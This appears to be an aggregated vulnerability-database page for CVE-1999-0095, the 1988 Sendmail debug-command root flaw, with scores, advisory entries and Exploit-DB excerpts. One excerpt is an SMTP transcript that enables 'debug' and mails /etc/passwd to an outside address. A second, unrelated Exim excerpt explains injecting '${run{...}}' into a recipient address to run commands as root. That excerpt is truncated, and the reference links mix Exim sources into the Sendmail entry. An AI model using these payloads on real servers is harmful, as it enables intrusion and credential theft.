CVE-1999-0095
published 1988-10-01
CVE-1999-0095: The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
Priority P354 · critical · CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 16.45% (96.6th percentile)
The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eric_allman | sendmail | — | — |
VulDB
Berkeley Sendmail up to 5.58 DEBUG privileges management (CA-1988-01 / EDB-19028)
vuldb·2026-04-16·CVSS 10.0
CVE-1999-0095 [CRITICAL] Berkeley Sendmail up to 5.58 DEBUG privileges management (CA-1988-01 / EDB-19028)
A vulnerability, which was classified as critical, was found in Berkeley Sendmail up to 5.58. This vulnerability affects unknown code of the component DEBUG Handler. Such manipulation leads to improper privilege management.
This vulnerability is referenced as CVE-1999-0095. It is possible to launch the attack remotely. Furthermore, an exploit is available. This vulnerability has historical importance owing to its background and reception.
You should upgrade the affected component.
GHSA
GHSA-pf77-xv47-9wfc: The debug command in Sendmail is enabled, allowing attackers to execute commands as root
ghsa_unreviewed·2022-04-30
CVE-1999-0095 [HIGH] GHSA-pf77-xv47-9wfc: The debug command in Sendmail is enabled, allowing attackers to execute commands as root
The debug command in Sendmail is enabled, allowing attackers to execute commands as root.
No detection rules found.
Exploit-DB
Exim 4.87 < 4.91 - (Local / Remote) Command Execution
exploitdb·2019-06-05·CVSS 9.8
CVE-2019-10149 [CRITICAL] Exim 4.87 < 4.91 - (Local / Remote) Command Execution
Exim 4.87 address));
    deliver_domain = expand_string(
        string_sprintf("${domain:%s}", new->address));

    (void) event_raise(event_action,
        US"msg:fail:internal", new->message);

    deliver_localpart = save_local;
    deliver_domain = save_domain;
    }
#endif
Because expand_string() recognizes the "${run{ }}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):
[...]
Remote exploitation
Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's def
Exploit-DB
Berkeley Sendmail 5.58 - Debug
exploitdb·1988-08-01
CVE-1999-0095 Berkeley Sendmail 5.58 - Debug
Berkeley Sendmail 5.58 - Debug
---
220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from:
250 OK
rcpt to:
250 OK
data
354 Start mail input; end with .
mail [email protected] </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating
The sed in the recipient strips all mail headers from the
message before passing it on to the shell.
http://seclists.org/fulldisclosure/2019/Jun/16
http://www.openwall.com/lists/oss-security/2019/06/05/4
http://www.openwall.com/lists/oss-security/2019/06/06/1
http://www.osvdb.org/195
http://www.securityfocus.com/bid/1
Published: 1988-10-01